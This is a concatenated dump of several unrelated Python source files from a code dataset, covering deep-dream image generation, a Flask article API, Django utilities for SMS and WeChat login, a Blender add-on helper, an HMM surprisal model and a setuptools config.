move_network_to_device(network,gaussian_filter,device):\r\n '''moves network and gaussian filter to gpu,if available'''\r\n network.to(device)\r\n gaussian_filter.gaussian_filter.to(device)\r\n\r\n return network,gaussian_filter\r\n\r\ndef move_img_to_device(img,device):\r\n '''moves an image tensor to gpu,if available'''\r\n img = img.to(device)\r\n\r\n return img\r\n\r\ndef check_if2D(image_dim):\r\n '''Given a image shape returns a bool whether the image is 2D or 3D. Input tuple should be of the form HxWxC'''\r\n if image_dim[-1] == 1:\r\n img_is2D = True\r\n elif image_dim[-1] == 3:\r\n img_is2D = False\r\n else:\r\n print(\"image dimension not correct\")\r\n return\r\n return img_is2D\r\n \r\ndef display_grid(batch_tensor):\r\n batch_tensor = batch_tensor.detach()\r\n grid_img = utils.make_grid(batch_tensor, nrow=4)\r\n plt.imshow(grid_img.permute(1, 2, 0))\r\n\r\ndef save_image(batch_tensor,file_name=\"dreams.png\"):\r\n batch_tensor = batch_tensor.detach()\r\n utils.save_image(batch_tensor,file_name,nrow=4)\r\n \r\nclass GaussianFilter:\r\n '''Creates a gaussian filter with given kernel size and sigma values.\r\n This filter is used to apply gaussian filter on an input image(2D or 3D\r\n depending on the variable input_img_is2D) through convolution'''\r\n def __init__(self,input_img_is2D=True,kernel_size=3,sigma=0.5):\r\n \r\n x_cord = torch.arange(kernel_size)\r\n x_grid = x_cord.repeat(kernel_size).view(kernel_size, kernel_size)\r\n y_grid = x_grid.t()\r\n xy_grid = torch.stack([x_grid, y_grid], dim=-1)\r\n xy_grid = xy_grid.float()\r\n\r\n mean = (kernel_size - 1)/2.\r\n variance = sigma**2.\r\n gaussian_kernel = (1./(2.*math.pi*variance)) * torch.exp(-torch.sum((xy_grid - mean)**2., dim=-1) /(2*variance))\r\n gaussian_kernel = gaussian_kernel / torch.sum(gaussian_kernel)\r\n \r\n gaussian_kernel = gaussian_kernel.view(1, 1, kernel_size, kernel_size)\r\n pad = math.floor(kernel_size/2)\r\n \r\n if input_img_is2D:\r\n self.gaussian_filter = nn.Conv2d(in_channels=1,out_channels=1,padding=pad,kernel_size=kernel_size, groups=1,bias=False)\r\n \r\n else: # input image is 3D\r\n gaussian_kernel = gaussian_kernel.repeat(3, 1, 1, 1)\r\n self.gaussian_filter = nn.Conv2d(in_channels=3,out_channels=3,padding=pad,kernel_size=kernel_size, groups=3,bias=False)\r\n \r\n self.gaussian_filter.weight.data = gaussian_kernel\r\n self.gaussian_filter.weight.requires_grad = False \r\n \r\n def __call__(self,input_tensor):\r\n return self.gaussian_filter(input_tensor)\r\n \r\ndef main():\r\n # create deep dream images with DictNet\r\n network = DictNet(1000)\r\n network.load_state_dict(torch.load(\"../code/train_dict_network/out_3_1000/model_best.pth.tar\")['state_dict'])\r\n output_batch = dream(network,[80,366],(32,128,1),(0.47,),(0.14,))\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_mjsynth.png\")\r\n \r\n # create deep dream images with MNIST\r\n network = Net()\r\n network.load_state_dict(torch.load('../deep_dream_mnist/mnist.pth'))\r\n output_batch = dream(network,[3,4],(28,28,1),(0.13,),(0.31,))\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_MNIST.png\")\r\n \r\n # create deep dream images with ImageNet\r\n network = models.vgg19(pretrained=True)\r\n output_batch = dream(network,[79,736],(224,224,3),(0.485, 0.456, 0.406),(0.229, 0.224, 0.225),nItr=400)\r\n #display_grid(output_batch)\r\n save_image(output_batch,\"dreams_ImageNet.png\")\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"library/create_dream.py","file_name":"create_dream.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"281124092","text":"# -*- coding:utf-8 -*-\nimport json\nfrom scholarnet import Scholarnet\n\n# ログインデータの読み込み\nwith open(\"profile.json\", 'r') as f:\n profile = json.load(f)\n\n# 更新情報の取得\nscholar = Scholarnet()\nhtml_top, html_univ = scholar.get_pages(profile)\nnext_date, updated_date = scholar.get_dates(html_top)\n\n# 返還データの取得\ncontents = scholar.get_contents(html_univ, profile[\"type\"])\n\n# 結果の表示\nprint(\"今回の更新日: %s\" % updated_date)\nprint(\"次回の更新日: %s\" % next_date)\nfor k,v in contents.items():\n print(\"%s: %s\" % (k,v))\n\n# データの保存\nwith open(\"contents_%s.json\" % updated_date, 'w') as f:\n json.dump(contents,f,ensure_ascii=False,indent=2)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"188798906","text":"import json\n\nfrom flask import Blueprint, current_app,\\\n Response, request, session\n\nfrom organization import admin_permission, db\nfrom organization.common.constants import CREATED, ERROR, JSON_HEADER, MSG, OK\nfrom organization.common.cors import crossdomain\nfrom organization.role.constants import GUEST_ROLE\n\nfrom .constants import APP_NAME\nfrom .models import Article\n\narticle_module = Blueprint(APP_NAME, __name__)\n\n\n@article_module.route(\"/articles/\", methods=[\"GET\"])\ndef index():\n articles = Article.objects.get()\n total_articles = len(articles)\n resp = Response(json.dumps({\"article_count\": total_articles}),\n status=OK,\n content_type=JSON_HEADER)\n return resp\n\n\n@article_module.route(\"/articles/\", methods=[\"POST\"])\ndef create():\n try:\n data = request.json\n article = Article(title=data['title'], words=data['words'],\n body=data['body'])\n article.save()\n resp = Response(json.dumps({MSG: \"Created\"}),\n status=CREATED,\n content_type=JSON_HEADER)\n except Exception as e:\n msg = \"Got error {error} while trying to save\".format(error=e.message)\n resp = Response(json.dumps({MSG: msg}),\n status=ERROR,\n content_type=JSON_HEADER)\n return resp\n","sub_path":"organization/article/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"614841999","text":"import json\r\nimport uuid\r\nimport os\r\nimport logging\r\nimport re\r\nimport base64\r\nfrom typing import Dict, Type, Callable, Union, Any, List, Iterable\r\nfrom datetime import datetime, date\r\nfrom urllib.parse import quote\r\nimport requests\r\nfrom traceback import print_exc\r\n\r\nfrom Crypto.Cipher import AES\r\nfrom CTUtil.types import DateSec\r\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\r\nfrom django.conf.urls import RegexURLPattern\r\nimport random\r\n\r\ntry:\r\n from aliyunsdkcore.client import AcsClient\r\n from aliyunsdkcore.profile import region_provider\r\n from aliyunsdkdysmsapi.request.v20170525 import SendSmsRequest\r\nexcept:\r\n print_exc()\r\n\r\n\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.ERROR)\r\nlogger_formatter = logging.Formatter(\r\n \"%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s\")\r\n\r\n\r\ndef queryset_paging(queryset: Iterable[Any], page: int, page_size: int):\r\n return queryset[(page - 1) * page_size: page * page_size]\r\n\r\n\r\ndef jstimestamp_to_datetime(jstimestamp: int):\r\n return datetime.fromtimestamp(jstimestamp // 1000)\r\n\r\n\r\ndef get_django_all_url(urlpatterns: List[Any]):\r\n urls = []\r\n\r\n def search_url(src_urls: List[Any], root: str, pre_urls: List[str]):\r\n for url in src_urls:\r\n _root = os.path.join(root, url._regex).replace('^', '')\r\n if isinstance(url, RegexURLPattern):\r\n pre_urls.append(_root)\r\n else:\r\n search_url(url.url_patterns, _root, pre_urls)\r\n\r\n search_url(urlpatterns, '/', urls)\r\n return urls\r\n\r\n\r\ndef set_default_file_path(files_dir: str='image',\r\n file_type: str='jpeg') -> str:\r\n _date: Type[date] = datetime.now().date()\r\n dir_path = os.path.join('static', files_dir, format(_date, '%Y%m%d'))\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n filename = '{file_name}.{file_type}'.format(\r\n file_name=str(uuid.uuid4()).replace('-', ''), file_type=file_type)\r\n path = os.path.join(dir_path, filename)\r\n return path\r\n\r\n\r\ndef process_base64_in_content(post: dict) -> None:\r\n content: str = post.setdefault('content', '')\r\n if not content:\r\n return\r\n search_base64 = re.search('\\\"data\\:image\\/(.*?)\\;base64\\,(.*?)\\\"', content)\r\n if not search_base64:\r\n return\r\n image_type = search_base64.group(1)\r\n image_base64_string = search_base64.group(2)\r\n image_decode = base64.b64decode(image_base64_string)\r\n file_path = set_default_file_path(file_type=image_type)\r\n with open(file_path, 'wb') as f:\r\n f.write(image_decode)\r\n content = content.replace(\r\n search_base64.group(), '\\\"{path}\\\"'.format(path=file_path))\r\n post['content'] = content\r\n\r\n\r\ndef make_code(count: int=4) -> str:\r\n data = [str(random.randint(0, 9)) for i in range(count)]\r\n return ''.join(data)\r\n\r\n\r\ndef process_file_return_path(request,\r\n files_name: str='file',\r\n files_dir: str='image'):\r\n myFile = request.FILES.get(files_name)\r\n if not myFile:\r\n return\r\n if myFile:\r\n file_type = (myFile.name).split(\".\")[-1]\r\n file_path = set_default_file_path(file_type=file_type)\r\n with open(file_path, 'wb+') as f:\r\n for chunk in myFile.chunks():\r\n f.write(chunk)\r\n return file_path.replace('\\\\', '/')\r\n\r\n\r\ndef process_files_return_pathlist(request, files_dir: str='image'):\r\n myFiles = request.FILES\r\n data_list = []\r\n if myFiles:\r\n for myFile in myFiles.itervalues():\r\n file_type = (myFile.name).split(\".\")[-1]\r\n file_path = set_default_file_path(file_type=file_type)\r\n with open(file_path, 'wb+') as f:\r\n for chunk in myFile.chunks():\r\n f.write(chunk)\r\n data_list.append(file_path.replace('\\\\', '/'))\r\n return data_list\r\n\r\n\r\nclass TokenSerializer(object):\r\n\r\n def __init__(self, salt: str, overtime_sec: Type[DateSec]=DateSec.DAY):\r\n self.s = Serializer(salt, expires_in=overtime_sec)\r\n\r\n def encode(self, data: Dict[str, Any]) -> bytes:\r\n return self.s.dumps(data)\r\n\r\n def decode(self, data: bytes) -> Dict[str, Any]:\r\n return self.s.loads(data)\r\n\r\n\r\nclass SMS(object):\r\n # 阿里云大于短信客户端接口\r\n \"\"\"\r\n 阿里大于接口返回\r\n docstring here\r\n return data: {\r\n 'RequestId': '请求id',\r\n 'Code': '状态码',\r\n 'Message': '状态码描述',\r\n 'BizId': '回执id',\r\n }\r\n \"\"\"\r\n\r\n REGION = \"cn-hangzhou\"\r\n PRODUCT_NAME = \"Dysmsapi\"\r\n DOMAIN = \"dysmsapi.aliyuncs.com\"\r\n\r\n def __init__(self, ACCESS_KEY_ID, ACCESS_KEY_SECRET, sign_name,\r\n template_code):\r\n self.acs_client = AcsClient(ACCESS_KEY_ID, ACCESS_KEY_SECRET,\r\n self.REGION)\r\n region_provider.add_endpoint(self.PRODUCT_NAME, self.REGION,\r\n self.DOMAIN)\r\n\r\n self.sign_name = sign_name\r\n self.template_code = template_code\r\n\r\n # 发送信息\r\n def send_sms(self, phone: str, code: int, context: Union[None, Dict[str, Any]]=None):\r\n business_id = uuid.uuid1()\r\n smsRequest = SendSmsRequest.SendSmsRequest()\r\n smsRequest.set_TemplateCode(self.template_code)\r\n if context:\r\n smsRequest.set_TemplateParam(json.dumps(context))\r\n smsRequest.set_OutId(business_id)\r\n smsRequest.set_SignName(self.sign_name)\r\n smsRequest.set_PhoneNumbers(phone)\r\n\r\n smsResponse: bytes = self.acs_client.do_action_with_exception(smsRequest)\r\n return json.loads(smsResponse)\r\n\r\n def __unicode__(self):\r\n return self.PRODUCT_NAME\r\n\r\n\r\nclass WxLogin(object):\r\n # 网页端微信第三方登录接口\r\n def __init__(self, APPID, APPSECRET):\r\n self.appid = APPID\r\n self.secret = APPSECRET\r\n self.redirect_url = quote('https://www.cingta.com/')\r\n\r\n # 生成二维码url\r\n def create_code_url(self):\r\n return 'https://open.weixin.qq.com/connect/qrconnect?appid={APPID}&redirect_uri={redirrect_uri}&response_type=code&scope={scope}&state=STATE#wechat_redirect'.format(\r\n APPID=self.appid,\r\n redirrect_uri=self.redirect_url,\r\n scope='snsapi_login', )\r\n\r\n # 获取open_id\r\n def get_access_token(self, code):\r\n url = 'https://api.weixin.qq.com/sns/oauth2/access_token?appid={APPID}&secret={APPSECRET}&code={CODE}&grant_type=authorization_code'.format(\r\n APPID=self.appid,\r\n APPSECRET=self.secret,\r\n CODE=code, )\r\n resp = requests.get(url).json()\r\n return resp\r\n\r\n # 获取unionid\r\n @staticmethod\r\n def get_unionid(token, openid):\r\n url = 'https://api.weixin.qq.com/sns/userinfo?access_token={token}&openid={openid}'.format(\r\n token=token,\r\n openid=openid, )\r\n resp = requests.get(url).json()\r\n return resp.get('unionid')\r\n\r\n\r\nclass WXBizDataCrypt:\r\n # 微信小程序解码, 腾讯官方代码, 直接调用\r\n def __init__(self, appId, sessionKey):\r\n self.appId = appId\r\n self.sessionKey = sessionKey\r\n\r\n def decrypt(self, encryptedData, iv):\r\n sessionKey = base64.b64decode(self.sessionKey)\r\n encryptedData = base64.b64decode(encryptedData)\r\n iv = base64.b64decode(iv)\r\n\r\n cipher = AES.new(sessionKey, AES.MODE_CBC, iv)\r\n data = self._unpad(cipher.decrypt(encryptedData))\r\n decrypted = json.loads(data)\r\n\r\n if decrypted['watermark']['appid'] != self.appId:\r\n raise Exception('Invalid Buffer')\r\n\r\n return decrypted\r\n\r\n def _unpad(self, s):\r\n return s[:-ord(s[len(s) - 1:])]\r\n\r\n\r\nclass WxMiniInterface(object):\r\n # 微信小程序各种接口\r\n def __init__(self, APPID: str, APPSECRET: str):\r\n self.APPID = APPID\r\n self.APPSECRET = APPSECRET\r\n\r\n def get_user_session(self, code: str) -> Dict[str, str]:\r\n url = 'https://api.weixin.qq.com/sns/jscode2session?appid={AppID}&secret={AppSecret}&js_code={code}&grant_type=authorization_code'.format(\r\n AppID=self.APPID,\r\n AppSecret=self.APPSECRET,\r\n code=code, )\r\n resp = requests.get(url).json()\r\n return resp\r\n\r\n def get_user_info(self, session: str, encryptedata: str, iv: str) -> str:\r\n wx_mini = WXBizDataCrypt(self.APPID, session)\r\n userinfo = wx_mini.decrypt(encryptedata, iv)\r\n return userinfo\r\n\r\n def send_template_msg(self, **templatedata) -> Dict[str, str]:\r\n get_user_info = set(\r\n ['touser', 'template_id', 'page', 'form_id', 'data'])\r\n if not (get_user_info & set(templatedata.keys()) == get_user_info):\r\n raise TypeError(\r\n 'send_template_msg missing required positional arguments: touser, template_id, page, form_id or data'\r\n )\r\n\r\n token_url: str = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={APPID}&secret={APPSECRET}'.format(\r\n APPID=self.APPID,\r\n APPSECRET=self.APPSECRET, )\r\n token: Dict[str, str] = requests.get(token_url).json()\r\n if token.get('errcode'):\r\n raise TypeError('error APPID or error APPSECRET')\r\n _token = token.get('access_token', '')\r\n template_url: str = 'https://api.weixin.qq.com/cgi-bin/message/wxopen/template/send?access_token={ACCESS_TOKEN}'.format(\r\n ACCESS_TOKEN=_token, )\r\n resp = requests.post(\r\n template_url, data=json.dumps(templatedata)).json()\r\n return resp\r\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"95157509","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# Copyright 2011, Ryan Inch\n\nfrom bpy.types import PropertyGroup\nfrom bpy.props import StringProperty\n\nlayer_collections = {}\n\ncollection_tree = []\n\nexpanded = []\n\nmax_lvl = 0\nrow_index = 0\n\ndef get_max_lvl():\n return max_lvl\n\ndef update_col_name(self, context):\n if self.name != self.last_name:\n if self.name == '':\n self.name = self.last_name\n return\n\n if self.last_name != '':\n layer_collections[self.last_name][\"ptr\"].collection.name = self.name\n\n update_property_group(context)\n\n self.last_name = self.name\n\nclass CMListCollection(PropertyGroup):\n name: StringProperty(update=update_col_name)\n last_name: StringProperty()\n\n\ndef update_collection_tree(context):\n global max_lvl\n global row_index\n collection_tree.clear()\n layer_collections.clear()\n max_lvl = 0\n row_index = 0\n\n init_laycol_list = context.view_layer.layer_collection.children\n\n master_laycol = {\"id\": 0,\n \"name\": context.view_layer.layer_collection.name,\n \"lvl\": -1,\n \"row_index\": -1,\n \"visible\": True,\n \"has_children\": True,\n \"expanded\": True,\n \"parent\": None,\n \"children\": [],\n \"ptr\": context.view_layer.layer_collection\n }\n\n get_all_collections(context, init_laycol_list, master_laycol, collection_tree, visible=True)\n\n\ndef get_all_collections(context, collections, parent, tree, level=0, visible=False):\n global row_index\n global max_lvl\n \n if level > max_lvl:\n max_lvl = level\n\n for item in collections:\n laycol = {\"id\": len(layer_collections) +1,\n \"name\": item.name,\n \"lvl\": level,\n \"row_index\": row_index,\n \"visible\": visible,\n \"has_children\": False,\n \"expanded\": False,\n \"parent\": parent,\n \"children\": [],\n \"ptr\": item\n }\n\n row_index += 1\n\n layer_collections[item.name] = laycol\n tree.append(laycol)\n\n if len(item.children) > 0:\n laycol[\"has_children\"] = True\n\n if item.name in expanded and laycol[\"visible\"]:\n laycol[\"expanded\"] = True\n get_all_collections(context, item.children, laycol, laycol[\"children\"], level+1, visible=True)\n\n else:\n get_all_collections(context, item.children, laycol, laycol[\"children\"], level+1)\n\n\ndef update_property_group(context):\n update_collection_tree(context)\n context.scene.CMListCollection.clear()\n create_property_group(context, collection_tree)\n\n\ndef create_property_group(context, tree):\n global in_filter\n\n for laycol in tree:\n new_cm_listitem = context.scene.CMListCollection.add()\n new_cm_listitem.name = laycol[\"name\"]\n\n if laycol[\"has_children\"]:\n create_property_group(context, laycol[\"children\"])\n","sub_path":"object_collection_manager/internals.py","file_name":"internals.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"545225812","text":"import os\nimport argparse\nimport numpy as np\nimport math\nfrom hmmlearn import hmm\nfrom utils.helpers import *\n\n\ndef hmm_action_selection(model, state_seq, sample=False):\n \"\"\"\n Input: HMM model and a state_seq\n Output: Computes p(x_t|x_t-1,...,x_0)\n TODO: Make option to greedly select next action!\n \"\"\"\n valid_successors, moves = get_valid_succesor(wm, state_seq[-1])\n coded_successors = string_to_code(valid_successors, observations)[0]\n current_v_state, lengths = string_to_code([state_seq], observations)\n\n # One HMM State Transition\n logprob, posteriors = model.score_samples(current_v_state, lengths)\n cond_distr = np.matmul(model.emissionprob_.T,\n np.matmul(model.transmat_.T, posteriors.T))\n\n full_distr_next_v_state = cond_distr[:, -1].ravel()\n distr_next_v_state = full_distr_next_v_state[coded_successors].ravel()/sum(full_distr_next_v_state[coded_successors]).ravel()\n n_valid_v_states = len(distr_next_v_state)\n\n # Sample or argmax\n if sample:\n next_move = np.random.choice(n_valid_v_states, 1, p=distr_next_v_state)[0]\n else:\n next_move = np.argmax(distr_next_v_state)\n\n # next_v_state = valid_successors[0][next_move]\n return next_move, full_distr_next_v_state\n\n\n startprob, transmat, emissionprob = init_hmm(no_obs=3, n_states=2)\n model = hmm_posterior(seq.reshape(1, -1).T,\n startprob, transmat, emissionprob,\n get_ic=False)\n\n\nclass SBL_HMM():\n \"\"\"\n DESCRIPTION: Hidden Markov Model Bayesian Sequential Learning Agent\n * Agent parses a binary sequence previously generated by HHMM\n * She updates her HMM posterior with new evidence\n * She calculates different surprise measures as the come in\n INPUT: Binary Sequence and Exponentially Weighted forgetting parameter\n OUTPUT: Predictive surprisal, Bayesian surprisal, Confidence-corrected surprisal\n [t, o_t, s_t, Prediction_Surprise, Bayesian_Surprise, Confidence_Corrected_Surprise]\n \"\"\"\n def __init__(self, seq, hidden, n_states, model_type=\"SP\", verbose=False):\n # Initialize SBL-learned sequence and exponential forgetting parameter\n self.sequence = seq.astype(int)\n self.hidden = hidden\n self.T = len(seq)\n\n self.type = model_type\n self.n_states = n_states\n self.verbose = verbose\n print(self.n_states)\n\n self.no_obs = np.unique(seq).shape[0]\n self.stim_ind = np.zeros((self.T, self.no_obs))\n\n # Construct matrix where col represents binary ind of specific stim at t\n for t in range(self.T):\n self.stim_ind[t, self.sequence[t]] = 1\n\n # AP: Generate T-dim vector indicating no-alternation from t-1 to t\n self.repetition = np.zeros(self.T)\n for t in range(1, self.T):\n if self.sequence[t] == self.sequence[t-1]:\n self.repetition[t] = 1\n\n # TP: Generate T-dim vectors indicating transition from state i\n self.transitions = np.zeros((self.T, self.no_obs))\n for t in range(1, self.T):\n self.transitions[t, 0] = (self.sequence[t-1] == 0)\n self.transitions[t, 1] = (self.sequence[t-1] == 1)\n self.transitions[t, 2] = (self.sequence[t-1] == 2)\n\n if self.type == \"SP\":\n self.posterior = np.ones(self.no_obs)/self.no_obs\n elif self.type == \"AP\":\n self.posterior = np.ones(2)/2\n elif self.type == \"TP\":\n self.posterior = np.ones((self.no_obs, self.no_obs))/self.no_obs\n else:\n raise \"Provide right model type (SP, AP, TP)\"\n\n\n def update_posterior_old(self):\n if self.type == \"SP\":\n for i in range(self.no_obs):\n self.alphas[i] = 1 + np.dot(exp_weighting, self.stim_ind[:self.t+1, i])\n\n elif self.type == \"AP\":\n if self.t == 0:\n print(\"Can't update posterior with only one observation - need two!\")\n self.alphas[0] = 1\n self.alphas[1] = 1\n else:\n self.alphas[0] = 1 + np.dot(exp_weighting, self.repetition[:self.t+1])\n self.alphas[1] = 1 + np.dot(exp_weighting, 1-self.repetition[:self.t+1])\n\n elif self.type == \"TP\":\n # print(self.sequence[:t], self.transition_from_0[:t], self.transition_from_1[:t])\n if self.t == 0:\n print(\"Can't update posterior with only one observation - need two!\")\n self.alphas = np.ones((self.no_obs, self.no_obs))\n else:\n for i in range(self.no_obs):\n for j in range(self.no_obs):\n # from-to alphas\n self.alphas[i, j] = 1 + np.dot(exp_weighting, self.stim_ind[:self.t+1, j]*self.transitions[:self.t+1, i])\n\n def init_hmm(self):\n \"\"\"\n Input: number of desired hidden states for HMM model\n Output: Uniformly initialized matrices for HMM training\n \"\"\"\n startprob = np.repeat(1./self.n_states, self.n_states)\n transmat = np.repeat([startprob], self.n_states, axis=0)\n if self.type == \"SP\":\n temp = np.repeat(1./self.no_obs, self.no_obs)\n elif self.type == \"AP\":\n temp = np.repeat(1./2, 2)\n emissionprob = np.repeat([temp], self.n_states, axis=0)\n\n return startprob, transmat, emissionprob\n\n\n def calc_all_posteriors(self):\n \"\"\"\n Input: Unique state id transformed data, length per ep trace and HMM inits\n Output: The trained HMM model with all attributes\n - Option: If desired get AIC and BIC for model as well\n \"\"\"\n startprob, transmat, emissionprob = self.init_hmm()\n # Uniform Initialization\n model = hmm.MultinomialHMM(n_components=self.n_states)\n model.startprob = startprob\n model.transmat = transmat\n model.emissionprob = emissionprob\n\n if self.type == \"SP\":\n temp = self.sequence[:self.T+1].reshape(1, -1).T\n elif self.type == \"AP\":\n temp = self.repetition[:self.T+1].reshape(1, -1).T\n\n self.model = model.fit(temp)\n logprob, posteriors = model.score_samples(temp)\n return posteriors\n\n def posterior_predictive(self, posterior):\n return np.matmul(self.model.emissionprob_.T, np.matmul(self.model.transmat_.T, posterior.T))\n\n def naive_posterior(self, posterior):\n return self.posterior_predictive(posterior)/self.posterior_predictive(posterior).sum(axis=0)\n\n def predictive_surprisal(self, posterior, ind):\n return -np.log(self.posterior_predictive(posterior)[ind])\n\n def bayesian_surprisal(self, posterior_old, posterior):\n return kl_general(posterior_old, posterior)\n\n def corrected_surprisal(self, posterior):\n return kl_general(self.naive_posterior(posterior), posterior)\n\n def compute_surprisal(self, max_T, verbose_surprisal=False):\n print(\"{}: Computing different surprisal measures for {} timesteps.\".format(self.type, max_T))\n results = []\n\n hmm_init_posterior = np.repeat(1./self.n_states, self.n_states)\n hmm_posteriors = self.calc_all_posteriors()\n\n for t in range(max_T+1):\n # Loop over the full sequence and compute surprisal iteratively\n self.t = t\n if t == 0:\n posterior_old = hmm_init_posterior\n else:\n posterior_old = hmm_posteriors[t-1]\n\n posterior = hmm_posteriors[t]\n\n if self.type == \"SP\":\n ind = int(self.sequence[self.t])\n elif self.type == \"AP\":\n ind = int(self.repetition[self.t])\n elif self.type == \"TP\":\n # from and to stimulus transition\n ind = (np.argmax(self.transitions[self.t, :]), np.argmax(self.stim_ind[self.t, :]))\n else:\n raise \"Provide right model type (SP, AP, TP)\"\n\n PS_temp = self.predictive_surprisal(posterior, ind)\n BS_temp = self.bayesian_surprisal(posterior_old, posterior)\n CS_temp = self.corrected_surprisal(posterior)\n\n if verbose_surprisal:\n print(\"{} - t={}: PS={}, BS={}, CS={}\".format(self.type, t+1, round(PS_temp, 4), round(BS_temp, 4), round(CS_temp, 4)))\n\n temp = [t, self.sequence[t], self.hidden[t], PS_temp, BS_temp, CS_temp]\n distr_params = list(posterior.reshape(1, -1)[0])\n results.append(temp + distr_params)\n print(\"{}: Done computing surprisal measures for all {} timesteps.\".format(self.type, self.T))\n return np.asarray(results)\n\n\ndef main(seq, hidden, n_states, model_type,\n prob_regime_init, prob_obs_init, prob_obs_change, prob_regime_change,\n save_results=False, title=\"temp\", verbose=False):\n # II: Compute Surprisal for all time steps for Stimulus Prob CatDir Model\n CD_SBL_temp = SBL_Cat_Dir(seq, hidden, n_states, model_type, verbose)\n results = CD_SBL_temp.compute_surprisal(max_T=CD_SBL_temp.T)\n\n time = results[:,0]\n sequence = results[:, 1]\n hidden = results[:, 2]\n PS = results[:, 2]\n BS = results[:, 3]\n CS = results[:, 4]\n\n results_formatted = {\"time\": time,\n \"sequence\": sequence,\n \"hidden\": hidden,\n \"predictive_surprise\": PS,\n \"bayesian_surprise\": BS,\n \"confidence_corrected_surprise\": CS,\n \"prob_regime_init\": prob_regime_init,\n \"prob_obs_init\": prob_obs_init,\n \"prob_obs_change\": prob_obs_change,\n \"prob_regime_change\": prob_regime_change}\n\n if save_results:\n save_obj(results_formatted, results_dir + title)\n print(\"Saved in File: {}\".format(results_dir + title))\n\n\ndef test_agent(seq, hidden, n_states, model_type, verbose=False):\n # Test IIa: Initialize SBL (seq, forgetting param), update posterior (t=3)\n HMM_SBL_temp = SBL_HMM(seq, hidden, n_states, model_type=model_type)\n # Test IIb: Compute Surprisal once (SP, t=3)\n HMM_SBL_temp.compute_surprisal(max_T=3, verbose_surprisal=True)\n # print(\"---------------------------------------------\")\n # # Test IIc: Compute Surprisal for all time steps for Stimulus Prob BB Model\n # results = CD_SBL_temp.compute_surprisal(max_T=CD_SBL_temp.T)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-file', '--sample_file', action=\"store\",\n default=\"temporary_sample_title\", type=str,\n help='Title of file in which sequence in stored')\n parser.add_argument('-states', '--n_states', action=\"store\",\n default=2, type=int,\n help='Number of Hidden States in HMM')\n parser.add_argument('-model', '--model', action=\"store\", default=\"SP\",\n type=str,\n help='Categorical Dirichlet Probability Model (SP, AP, TP)')\n parser.add_argument('-pkl_in', '--pickle', action=\"store_true\", help='Load matlab sequence file.')\n parser.add_argument('-T', '--test', action=\"store_true\", help='Run tests.')\n parser.add_argument('-S', '--save', action=\"store_true\", help='Save results to array.')\n parser.add_argument('-v', '--verbose',\n action=\"store_true\",\n default=False,\n\t\t\t\t\t\thelp='Get status printed out')\n\n args = parser.parse_args()\n\n if args.pickle:\n sample = load_obj(results_dir + args.sample_file + \".pkl\")\n else:\n sample = load_obj(results_dir + args.sample_file + \".mat\")\n\n seq = sample[\"sample_output\"][:, 2]\n hidden = sample[\"sample_output\"][:, 1]\n\n prob_regime_init = sample[\"prob_regime_init\"]\n prob_obs_init = sample[\"prob_obs_init\"]\n prob_obs_change = sample[\"prob_obs_change\"]\n prob_regime_change = sample[\"prob_regime_change\"]\n\n n_states = args.n_states\n model = args.model\n\n run_test = args.test\n save_results = args.save\n verbose = args.verbose\n\n if run_test:\n print(\"Started running basic tests.\")\n test_agent(seq, hidden, n_states, model, verbose)\n\n else:\n main(seq, hidden, n_states, model,\n prob_regime_init, prob_obs_init, prob_obs_change,\n prob_regime_change,\n save_results, title=\"HMM_\" + model + \"_\" + args.sample_file,\n verbose=False)\n\n \"\"\"\n How to run:\n pythonw seq_gen.py -t S1_800 -obs_change 0.75 0.15 0.85 0.25 0.5 0.75 0.25 0.5 -order 2 -matlab -seq 500\n pythonw sbl_hmm.py -file S1_800 -S -model SP\n \"\"\"\n","sub_path":"sbl_agents/sbl_hmm.py","file_name":"sbl_hmm.py","file_ext":"py","file_size_in_byte":12721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402603158","text":"import setuptools\nmy_math = setuptools.Extension('my_package.math',\n sources = ['my_package/math/math11.cpp'],\n extra_compile_args = ['-std=c++11'],\n)\n\nsetuptools.setup(\n name = 'my-project',\n version = '0.0.1',\n author = 'Mechazawa',\n license = 'BSD',\n ext_modules = [my_math],\n packages = ['my_package'],\n)\n","sub_path":"building-python/my-package/setuptools-ext11.py","file_name":"setuptools-ext11.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
